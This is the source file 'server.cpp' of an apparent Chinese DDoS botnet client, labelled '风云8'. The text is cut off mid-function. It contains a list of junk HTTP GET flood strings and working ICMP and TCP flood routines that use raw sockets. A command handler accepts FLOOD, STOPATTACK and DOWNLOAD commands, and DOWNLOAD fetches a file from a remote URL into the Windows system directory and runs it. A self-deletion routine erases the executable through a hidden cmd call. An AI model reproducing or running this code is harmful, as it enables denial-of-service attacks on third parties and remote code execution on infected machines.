server.cpp

风云8

	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
	"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
	"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
	"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp";


////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////
/////////////ICMP 攻击
/*ICMP Header*/
typedef struct _icmphdr				//定义ICMP首部
{
	BYTE   i_type;					//8位类型
	BYTE   i_code;					//8位代码
	USHORT i_cksum;					//16位校验和 
	USHORT i_id;					//识别号（一般用进程号作为识别号）
	USHORT i_seq;					//报文序列号	
	ULONG  timestamp;				//时间戳
}ICMP_HEADER;


#define ICMP_ECHO               8
#define MAX_PACKET       4096

void fill_icmp_data(char *icmp_data, int datasize)
{
	ICMP_HEADER *icmp_hdr;
	char       *datapart;
	icmp_hdr = (ICMP_HEADER*)icmp_data;
	icmp_hdr->i_type = ICMP_ECHO;
	icmp_hdr->i_code = 0;
	icmp_hdr->i_id   = (USHORT)GetCurrentProcessId();
	icmp_hdr->i_cksum = 0;
	icmp_hdr->i_seq = 0;

	datapart = icmp_data + sizeof(ICMP_HEADER);
	memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}

void icmp_flood()
{   
	Sleep(2000);
	WSADATA wsaData;
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	SOCKET m_hSocket;
	SOCKADDR_IN m_addrDest;
	char              *icmp_data;
	int   datasize = 32;
	int timeout = 2000;

	m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
	if (m_hSocket == INVALID_SOCKET) 
		return;
	if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) 
		return;

	memset(&m_addrDest, 0, sizeof(m_addrDest));
	m_addrDest.sin_family = AF_INET;
	if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
	{   
		 struct hostent *hp = NULL;
		 if ((hp = gethostbyname(tgtIP)) != NULL)
		 {
		 	memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);
		 	m_addrDest.sin_family = hp->h_addrtype;
		 }
		else
			return;
	}              

	datasize += sizeof(ICMP_HEADER);  
	icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
	memset(icmp_data,0,MAX_PACKET);
	fill_icmp_data(icmp_data,MAX_PACKET);
	int seq_no=0;
	int sleep_time = SleepTime/10;
	while(1)
	{ 
		if (StopFlag == 1)
		{
			ExitThread(0);
			return;
		}
		((ICMP_HEADER*)icmp_data)->i_cksum = 0;
		((ICMP_HEADER*)icmp_data)->i_seq =	seq_no++;
		((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
		((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
		for (int i=0;i<100;i++)
			sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest)); 
		Sleep(5);
	}
	return;
}
/////////////////ICMP攻击结束
////////////////////////////////////////////////////////////////////////////////////////////
///////////////tcp攻击开始
void tcp_flood()
{
	WSADATA               WSAData;
	WSAStartup(MAKEWORD(2,2) ,&WSAData);
	SOCKADDR_IN sockAddr;
	SOCKET	m_hSocket;
	int nSize = strlen(icmpBuffer);
	
	memset(&sockAddr,0,sizeof(sockAddr));
	sockAddr.sin_family = AF_INET;
	sockAddr.sin_port=htons(tgtPort);
	sockAddr.sin_addr.s_addr = inet_addr(tgtIP);
	if ((sockAddr.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
	{
		struct hostent *hp = NULL;
		if ((hp = gethostbyname(tgtIP)) != NULL)
		{
			memcpy(&(sockAddr.sin_addr), hp->h_addr, hp->h_length);
		 	sockAddr.sin_family = hp->h_addrtype;
		}
		else
			return;
	} 
	for(;;)
	{
		if (StopFlag == 1)
		{
			ExitThread(1);
			return;
		}

		m_hSocket = socket(PF_INET,SOCK_STREAM,0);
		if (connect(m_hSocket,(SOCKADDR*)&sockAddr, sizeof(sockAddr)) != 0)
			continue;
		for(int a=0;a<10240;a++)
		{
			if (send(m_hSocket,icmpBuffer,nSize,0) ==SOCKET_ERROR)
				break;
		}
		Sleep(SleepTime);
	}
	return;
}

void wait_for_end()
{
	DWORD s_time = timeout*60*1000;
	Sleep(s_time);
	StopFlag=1;
	for(int i =0;i <8; i++)
	{
		TerminateThread(hThread[i],0);
		CloseHandle(hThread[i]);
		CloseHandle(hThread[i]);
		hThread[i]=NULL;
	}
}

BOOL _DeleteMe()
{
	TCHAR szModule [MAX_PATH],
		  szComspec[MAX_PATH],
		  szParams [MAX_PATH];

	// get file path names:
	if((GetModuleFileName(0,szModule,MAX_PATH)!=0) &&
	   (GetShortPathName(szModule,szModule,MAX_PATH)!=0) &&
	   (GetEnvironmentVariable("COMSPEC",szComspec,MAX_PATH)!=0))
	{
		// set command shell parameters
		lstrcpy(szParams," /c  del ");
		lstrcat(szParams, szModule);
		lstrcat(szParams, " > nul");
		lstrcat(szComspec, szParams);


		// set struct members
		STARTUPINFO		si={0};
		PROCESS_INFORMATION	pi={0};
		si.cb = sizeof(si);
		si.dwFlags = STARTF_USESHOWWINDOW;
		si.wShowWindow = SW_HIDE;

		// increase resource allocation to program
		SetPriorityClass(GetCurrentProcess(),
				REALTIME_PRIORITY_CLASS);
		SetThreadPriority(GetCurrentThread(),
			THREAD_PRIORITY_TIME_CRITICAL);

		// invoke command shell
		if(CreateProcess(0, szComspec, 0, 0, 0,CREATE_SUSPENDED|
					DETACHED_PROCESS, 0, 0, &si, &pi))
		{
			// suppress command shell process until program exits
			SetPriorityClass(pi.hProcess,IDLE_PRIORITY_CLASS);
                        SetThreadPriority(pi.hThread,THREAD_PRIORITY_IDLE); 

			// resume shell process with new low priority
			ResumeThread(pi.hThread);

			// everything seemed to work
			return TRUE;
		}
		else // if error, normalize allocation
		{
			SetPriorityClass(GetCurrentProcess(),
							 NORMAL_PRIORITY_CLASS);
			SetThreadPriority(GetCurrentThread(),
							  THREAD_PRIORITY_NORMAL);
		}
	}
	return FALSE;
}

BOOL _ExplainCmd(char *cmd)
{
	if (strncmp(cmd,"FLOOD:",6) == 0)
	{
		//FLOOD:www.x.com|80|10|syn_udp_tcp_icmp_|/index.html
		char ip[30],sp[10],tm[10],flag[30],obj[80];
		memset(ip,'\0',30);
		memset(sp,'\0',10);
		memset(tm,'\0',10);
		memset(flag,'\0',30);
		memset(tgtIP,'\0',30);
		memset(obj,'\0',80);

		CString strLine = cmd;
		strLine.Delete(0,strLine.Find(":")+1);
		strcpy(ip,strLine.Left(strLine.Find("|")));
		strLine.Delete(0,strLine.Find("|")+1);
		strcpy(sp,strLine.Left(strLine.Find("|")));
		strLine.Delete(0,strLine.Find("|")+1);
		strcpy(tm,strLine.Left(strLine.Find("|")));
		strLine.Delete(0,strLine.Find("|")+1);
		strcpy(flag,strLine.Left(strLine.Find("|")));
		strLine.Delete(0,strLine.Find("|")+1);
		strcpy(obj,strLine.GetBuffer(0));

		tgtPort = atoi(sp);
		timeout = atoi(tm);

		if (tgtPort <=0)
			tgtPort = 80;
		if (timeout <=0 || timeout >= 120)
			timeout = 120;

		if (inet_addr(ip)== INADDR_NONE)
		{
			struct hostent *hp = NULL;
			if ((hp = gethostbyname(ip)) != NULL)
			{
				in_addr in;
				memcpy(&in, hp->h_addr, hp->h_length);
				strcpy(tgtIP,inet_ntoa(in));
			}
		}
		else
			strcpy(tgtIP,ip);

		if (StopFlag == -1)
			return TRUE;

		StopFlag=-1;
		fill_syn_buffer();
		fill_udp_buffer();
		if (strstr(flag,"syn") != NULL)
		{
			hThread[0] = CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE) syn_flood,NULL, 0, NULL);
			hThread[1] = CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE) syn_flood,NULL, 0, NULL);
		}
		if (strstr(flag,"udp") != NULL)
		{
			hThread[2] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)udp_flood, NULL, 0, NULL);
			hThread[3] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)udp_flood, NULL, 0, NULL);
		}
		if (strstr(flag,"tcp") != NULL)
		{
			hThread[4] = CreateThread(0,0,(LPTHREAD_START_ROUTINE)tcp_flood,NULL,0,NULL);
			hThread[5] = CreateThread(0,0,(LPTHREAD_START_ROUTINE)tcp_flood,NULL,0,NULL);
		}
		if (strstr(flag,"icmp") != NULL)	
		{
			hThread[6] = CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmp_flood,NULL,0,NULL);
			hThread[7] = CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmp_flood,NULL,0,NULL);
		}

		CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
		return TRUE;
	}

	if (strstr(cmd,"STOPATTACK") != NULL)
	{
		StopFlag=1;
		StopFlag=1;
		
		for(int i =0;i <8; i++)
		{
			TerminateThread(hThread[i],0);
			CloseHandle(hThread[i]);
			CloseHandle(hThread[i]);
			hThread[i]=NULL;
		}
		return TRUE;
	}

	if (strncmp(cmd,"DOWNLOAD:",9) == 0)
	{
		char url[256];
		memset(url,0,256);
		strcpy(url,strchr(cmd,':')+1);

		char seps[]= "/";
		char *token;
		char *file;
		char myURL[MAX_PATH] ={0};
		char myFILE[MAX_PATH] = {0};

		strcpy(myURL,url);
		token=strtok(myURL,seps);
  		while(token!=NULL)
		{
			file=token;
			token=strtok(NULL,seps);
		}
		GetSystemDirectory(myFILE,MAX_PATH);
		strcat(myFILE, "\\");
		strcat(myFILE, file);

		HRESULT hr;
		hr = URLDownloadToFile(0, url, myFILE, 0, 0);
		if(hr!=S_OK)
			return FALSE;
		PROCESS_INFORMATION PI;
		STARTUPINFO SI;
		memset(&SI, 0, sizeof(SI));
		SI.cb = sizeof(SI);
		CreateProcess(myFILE, NULL, NULL, NULL, FALSE,NORMAL_PRIORITY_CLASS, NULL, NULL, &SI, &PI);
		return TRUE;
	}

	if (strncmp(cmd,"UPDATEDATA:",11) == 0)
	{
		char url[256];